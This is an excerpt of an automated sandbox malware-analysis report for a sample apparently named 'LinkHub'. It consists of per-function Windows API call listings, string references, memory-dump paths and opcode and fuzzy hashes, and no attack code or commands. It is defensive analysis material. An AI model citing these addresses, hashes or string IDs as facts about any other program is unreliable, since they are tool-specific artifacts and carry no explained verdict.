                                                                                          • Part of subcall function 002696E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00268271,?,000000FF,?,002690BB,00000000,?,0000001C,?,?), ref: 002696F3
                                                                                          • Part of subcall function 002696E4: lstrcpyW.KERNEL32(00000000,?,?,00268271,?,000000FF,?,002690BB,00000000,?,0000001C,?,?,00000000), ref: 00269719
                                                                                          • Part of subcall function 002696E4: lstrcmpiW.KERNEL32(00000000,?,00268271,?,000000FF,?,002690BB,00000000,?,0000001C,?,?), ref: 0026974A
                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,002690BB,00000000,?,0000001C,?,?,00000000), ref: 0026828A
                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,002690BB,00000000,?,0000001C,?,?,00000000), ref: 002682B0
                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,002690BB,00000000,?,0000001C,?,?,00000000), ref: 002682EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                        • String ID: cdecl
                                                                                        • API String ID: 4031866154-3896280584
                                                                                        • Opcode ID: c7b47baa30120792e287303e55e763d1b8d6a299d2a9c54f8fcdd9a5bfa2ade3
                                                                                        • Instruction ID: b451c7ac4183ba06f9ba4139c6cd65440997484cad5bec559236137e1a5c4a15
                                                                                        • Opcode Fuzzy Hash: c7b47baa30120792e287303e55e763d1b8d6a299d2a9c54f8fcdd9a5bfa2ade3
                                                                                        • Instruction Fuzzy Hash: 6D11263A210382ABCB149F38D849E7A77A9FF49750B50412AF946C7260EF71D8B1DB90
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 0029615A
                                                                                        • _wcslen.LIBCMT ref: 0029616C
                                                                                        • _wcslen.LIBCMT ref: 00296177
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 002962B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 455545452-0
                                                                                        • Opcode ID: 9def2ea098e7e673398086ca8ebcc92e638848802420fd90755ca9958de4df2d
                                                                                        • Instruction ID: 42095c5583143996870ccb3e7a87311f12259964a349e98a7f43f9f609943b6b
                                                                                        • Opcode Fuzzy Hash: 9def2ea098e7e673398086ca8ebcc92e638848802420fd90755ca9958de4df2d
                                                                                        • Instruction Fuzzy Hash: 6E110631A30219A6DF10DFA49C88AEF77BCEF127A0F10402BF905D5181E7B4C964DB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00262394
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002623A6
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002623BC
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002623D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • API String ID: 3850602802-0
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0026EB14
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 0026EB47
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0026EB5D
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0026EB64
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                        • API String ID: 2880819207-0
                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,?,0022D369,00000000,00000004,00000000), ref: 0022D588
                                                                                        • GetLastError.KERNEL32 ref: 0022D594
                                                                                        • __dosmaperr.LIBCMT ref: 0022D59B
                                                                                        • ResumeThread.KERNEL32(00000000), ref: 0022D5B9
                                                                                        Similarity
                                                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                        • API String ID: 173952441-0
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002078B1
                                                                                        • GetStockObject.GDI32(00000011), ref: 002078C5
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 002078CF
                                                                                        Similarity
                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                        • API String ID: 3970641297-0
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002711D9,00000000,00000000,?,0023338D,002711D9,00000000,00000000,00000000,?,002335FE,00000006,FlsSetValue), ref: 00233418
                                                                                        • GetLastError.KERNEL32(?,0023338D,002711D9,00000000,00000000,00000000,?,002335FE,00000006,FlsSetValue,002A3260,FlsSetValue,00000000,00000364,?,002331B9), ref: 00233424
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0023338D,002711D9,00000000,00000000,00000000,?,002335FE,00000006,FlsSetValue,002A3260,FlsSetValue,00000000), ref: 00233432
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • API String ID: 3177248105-0
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0026B69A,?,00008000), ref: 0026BA8B
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0026B69A,?,00008000), ref: 0026BAB0
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0026B69A,?,00008000), ref: 0026BABA
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0026B69A,?,00008000), ref: 0026BAED
                                                                                        Similarity
                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                        • API String ID: 2875609808-0
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 0029888E
                                                                                        • ScreenToClient.USER32(?,?), ref: 002988A6
                                                                                        • ScreenToClient.USER32(?,?), ref: 002988CA
                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002988E5
                                                                                        Similarity
                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                        • API String ID: 357397906-0
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00263712
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00263723
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0026372A
                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00263731
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                        • API String ID: 2710830443-0
                                                                                        APIs
                                                                                          • Part of subcall function 00201F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00201F87
                                                                                          • Part of subcall function 00201F2D: SelectObject.GDI32(?,00000000), ref: 00201F96
                                                                                          • Part of subcall function 00201F2D: BeginPath.GDI32(?), ref: 00201FAD
                                                                                          • Part of subcall function 00201F2D: SelectObject.GDI32(?,00000000), ref: 00201FD6
                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 002992E3
                                                                                        • LineTo.GDI32(?,?,?), ref: 002992F0
                                                                                        • EndPath.GDI32(?), ref: 00299300
                                                                                        • StrokePath.GDI32(?), ref: 0029930E
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                        • API String ID: 1539411459-0
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 002021BC
                                                                                        • SetTextColor.GDI32(?,?), ref: 002021C6
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 002021D9
                                                                                        • GetStockObject.GDI32(00000005), ref: 002021E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ModeObjectStockText
                                                                                        • String ID:
                                                                                        • API String ID: 4037423528-0
                                                                                        • Opcode ID: 18a36825a0d782cc63a152aa8f2266546a6b1e055707de06f4ad712fae17abc3
                                                                                        • Instruction ID: 931f91f729b02461341e64ed23fbb97cf82f9ee4d96a4e1e386d69a9dc7b1ec2
                                                                                        • Opcode Fuzzy Hash: 18a36825a0d782cc63a152aa8f2266546a6b1e055707de06f4ad712fae17abc3
                                                                                        • Instruction Fuzzy Hash: F2E06D32240241AADB219F74BC0DBE87B21AB16336F04821BF7BA580E1C7728650AB10
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 0025EC36
                                                                                        • GetDC.USER32(00000000), ref: 0025EC40
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0025EC60
                                                                                        • ReleaseDC.USER32(?), ref: 0025EC81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 077c58525c171135f34c0d06541d356b6233b93ef9ab5df33c05625d94cd6bfa
                                                                                        • Instruction ID: e5471bf46c07ad82499451e8b6f52f0e1c6d94f87789d81b8630e32f58c08f84
                                                                                        • Opcode Fuzzy Hash: 077c58525c171135f34c0d06541d356b6233b93ef9ab5df33c05625d94cd6bfa
                                                                                        • Instruction Fuzzy Hash: 6CE01A75810204DFCF409FA0E90CA5DBBB9EB18311F11840AE80AE3250C7795951AF04
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 0025EC4A
                                                                                        • GetDC.USER32(00000000), ref: 0025EC54
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0025EC60
                                                                                        • ReleaseDC.USER32(?), ref: 0025EC81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: acd60c545f93820d3af29fce60ca2d8b65d42ba65f62a129f915a284ee450032
                                                                                        • Instruction ID: 8e27866f66fbd56c56f7ac3b4289f8996b4b99c94df72de183a25c5c74a8f881
                                                                                        • Opcode Fuzzy Hash: acd60c545f93820d3af29fce60ca2d8b65d42ba65f62a129f915a284ee450032
                                                                                        • Instruction Fuzzy Hash: B9E012B9C00204EFCF509FA0E90CA5DBBB9AB18310B10840AE80AE3290CB796951AF00
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString
                                                                                        • String ID: @COM_EVENTOBJ$bn&
                                                                                        • API String ID: 2948472770-4249960297
                                                                                        • Opcode ID: 04013f83fd2db94f1a7f4388c9149319202fee5db09b48eb9784280fa7e2b81e
                                                                                        • Instruction ID: a75a332a67afa67805f810862aa75ceb60e7c54d7764639ef7a765812f2c7def
                                                                                        • Opcode Fuzzy Hash: 04013f83fd2db94f1a7f4388c9149319202fee5db09b48eb9784280fa7e2b81e
                                                                                        • Instruction Fuzzy Hash: CDF1C170A283019FD724DF14C885B6AB7E0BF84344F14885DF98A9B261C771EE69CF86
                                                                                        APIs
                                                                                          • Part of subcall function 002205B2: EnterCriticalSection.KERNEL32(002D170C,?,00000000,?,0020D22A,002D3570,00000001,00000000,?,?,0027F023,?,?,00000000,00000001,?), ref: 002205BD
                                                                                          • Part of subcall function 002205B2: LeaveCriticalSection.KERNEL32(002D170C,?,0020D22A,002D3570,00000001,00000000,?,?,0027F023,?,?,00000000,00000001,?,00000001,002D2430), ref: 002205FA
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 00220413: __onexit.LIBCMT ref: 00220419
                                                                                        • __Init_thread_footer.LIBCMT ref: 00288658
                                                                                          • Part of subcall function 00220568: EnterCriticalSection.KERNEL32(002D170C,00000000,?,0020D258,002D3570,002427C9,00000001,00000000,?,?,0027F023,?,?,00000000,00000001,?), ref: 00220572
                                                                                          • Part of subcall function 00220568: LeaveCriticalSection.KERNEL32(002D170C,?,0020D258,002D3570,002427C9,00000001,00000000,?,?,0027F023,?,?,00000000,00000001,?,00000001), ref: 002205A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                        • String ID: Variable must be of type 'Object'.$bn&
                                                                                        • API String ID: 535116098-2939824160
                                                                                        • Opcode ID: b8f3a318ddacf2d7e898e61bac7e3a4f661a5868a95f175aa7b0e214c44e9b4f
                                                                                        • Instruction ID: 71332af4a598a883ca66da272aad0cfe2629ae1b5b00eda4b785929565d5db34
                                                                                        • Opcode Fuzzy Hash: b8f3a318ddacf2d7e898e61bac7e3a4f661a5868a95f175aa7b0e214c44e9b4f
                                                                                        • Instruction Fuzzy Hash: 3B918F38A21209EFCB14EF54D885DADB7B5BF08300F908059F9066B292DB71AE61CF51
                                                                                        APIs
                                                                                          • Part of subcall function 002041EA: _wcslen.LIBCMT ref: 002041EF
                                                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00275919
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Connection_wcslen
                                                                                        • String ID: *$LPT
                                                                                        • API String ID: 1725874428-3443410124
                                                                                        • Opcode ID: 04ae48f9ac37ff19767bb94d39746356540983c9e438e552077197cfe5acc080
                                                                                        • Instruction ID: 07c65d3ffc2c7023987aee13447159410d78089f77958027325dc0477533505c
                                                                                        • Opcode Fuzzy Hash: 04ae48f9ac37ff19767bb94d39746356540983c9e438e552077197cfe5acc080
                                                                                        • Instruction Fuzzy Hash: 54918B75A10615DFCB14DF54C484EAABBF1AF44304F18C099E84A9F3A2C7B1EE96CB90
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 002658AF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: 0$-$Container
                                                                                        • API String ID: 3565006973-3151908934
                                                                                        • Opcode ID: 29f2afe4ddf29299f64677b406f9b628b8c956cff45e77203e106a040b85af4a
                                                                                        • Instruction ID: 9d5d04b999625ce55fc78013a1ec7e680376fe5f63eb6b2a8b126be564700db4
                                                                                        • Opcode Fuzzy Hash: 29f2afe4ddf29299f64677b406f9b628b8c956cff45e77203e106a040b85af4a
                                                                                        • Instruction Fuzzy Hash: 3A812770610611EFDB14DF54C884B6ABBF9FF49710F10856EF94A8B6A1DBB0A891CB90
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 0022E67D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 3213639722-2276729525
                                                                                        • Opcode ID: 41fb53ba92f3541c6d75fb04f15b5e84d4efcaba002326bc1d02f299eb9c3b3f
                                                                                        • Instruction ID: b6556690c76f5a2a824c8ee745b8d8a329939729430e85a2accfc33603f00c36
                                                                                        • Opcode Fuzzy Hash: 41fb53ba92f3541c6d75fb04f15b5e84d4efcaba002326bc1d02f299eb9c3b3f
                                                                                        • Instruction Fuzzy Hash: C4517DE1D38303A6CF15BF54ED0137A6BA4AB50B00F214D58F0D9892E8DF758CB5AA46
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #
                                                                                        • API String ID: 0-1885708031
                                                                                        • Opcode ID: 6630661b4a9f7ac0647fc06dca24c8504b16b2db6d85e5f24cc7672ee879a5dd
                                                                                        • Instruction ID: b1bbefbad49efa48a9c1145eec1936204ff572b2b8c8a2c892f44fa8f022d276
                                                                                        • Opcode Fuzzy Hash: 6630661b4a9f7ac0647fc06dca24c8504b16b2db6d85e5f24cc7672ee879a5dd
                                                                                        • Instruction Fuzzy Hash: 31515E31526347DFCB25DF28C041AFA7BA4EF25310F644049EC91AB2C1DBB09DAACB65
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 0021F6DB
                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0021F6F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
APIs
• _wcslen.LIBCMT ref: 0027DB75
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0027DB7F
Strings
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 002940BD
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002940F8
Strings
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002950BD
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002950D2
Strings
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
  • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
  • Part of subcall function 00202234: GetWindowLongW.USER32(?,000000EB), ref: 00202242
• GetParent.USER32(?), ref: 00243440
• DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 002434CA
Strings
Similarity
• API ID: LongWindow$ParentProc
• String ID: (-
• API String ID: 2181805148-4239615555
APIs
  • Part of subcall function 00207873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002078B1
  • Part of subcall function 00207873: GetStockObject.GDI32(00000011), ref: 002078C5
  • Part of subcall function 00207873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002078CF
• GetWindowRect.USER32(00000000,?), ref: 00294216
• GetSysColor.USER32(00000012), ref: 00294230
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0027D7C2
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0027D7EB
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
  • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
• CharUpperBuffW.USER32(?,?,?), ref: 0026761D
• _wcslen.LIBCMT ref: 00267629
Strings
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: STOP
• API String ID: 1256254125-2411985666
APIs
  • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
  • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00262699
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
APIs
  • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
  • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00262593
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
APIs
  • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
  • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00262615
